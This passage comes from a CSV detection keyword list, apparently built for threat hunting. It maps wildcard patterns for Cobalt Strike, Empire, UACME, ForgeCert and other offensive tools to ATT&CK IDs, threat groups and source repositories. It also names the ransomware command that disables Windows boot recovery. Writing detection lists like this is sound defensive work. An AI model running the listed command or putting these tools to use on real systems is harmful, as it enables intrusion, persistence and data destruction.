-*bcdedit* /set {default} recoveryenabled No*,greyware_tool_keyword,bcdedit,Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.,T1218.004 - T1562.001,TA0007 - TA0040,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*bcdedit.exe /set {default} recoveryenabled No*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BCHASH-Rijndael-128.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*BCHASH-Rijndael-256.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*bcrossc2_load_dyn*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*BC-SECURITY*,offensive_tool_keyword,Github Username,Cybersecurity Engineers and Offensive Security enthusiasts actively maintaining/updating Powershell Empire in our spare time.,T1021 - T1024 - T1027 - T1059 - T1074 - T1053,TA0008 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/BC-SECURITY,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BC-SECURITY*Malleable*,offensive_tool_keyword,cobaltstrike,Malleable C2 Profiles. A collection of profiles used in different projects using Cobalt Strike & Empire.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*bc-security/empire*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*BC-SECURITY/Starkiller*,offensive_tool_keyword,empire,Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,N/A,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*bd346689-8ee6-40b3-858b-4ed94f08d40a*,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,0,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -*BD602C80-47ED-4294-B981-0119D2200DB8*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,0,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*bdamele/icmpsh*,offensive_tool_keyword,icmpsh,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/r00t-3xp10it/venom,1,1,N/A,10,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*bdcsync*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bdlcnpceagnkjnjlbbbcepohejbheilk*,greyware_tool_keyword,Malus VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bdllinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bdllinject*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bdllload*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bdllload*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bdllspawn*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bdllspawn*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*be93e59137554e3f45e8c6fbc22f0fbe42a1dfa8e457e60894bfda1388d61a1e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*Beacon Payload Generator*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*beacon.*winsrv.dll*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*beacon.CommandBuilder*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*beacon.CommandBuilder*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*beacon.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.elf*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*beacon.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A 